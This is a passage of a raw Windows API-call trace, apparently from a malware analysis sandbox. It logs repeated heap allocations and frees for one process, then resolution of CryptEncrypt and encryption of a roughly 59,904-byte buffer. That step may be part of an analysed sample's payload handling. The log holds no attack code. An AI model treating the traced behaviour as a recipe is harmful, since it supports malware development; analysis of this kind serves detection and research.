Size=0x10) returned 0x2e51478 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0241.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0241.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0241.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0241.011] CharLowerBuffW (in: lpsz="byte[59904]", cchLength=0xb | out: lpsz="byte[59904]") returned 0xb [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xea00) returned 0x2e80330 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0241.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.015] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0241.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.015] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0241.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0241.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.018] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0241.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.018] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xe9fe, dwBufLen=0xea00 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xea00) returned 1 [0241.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0241.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0241.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0241.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0241.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0241.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 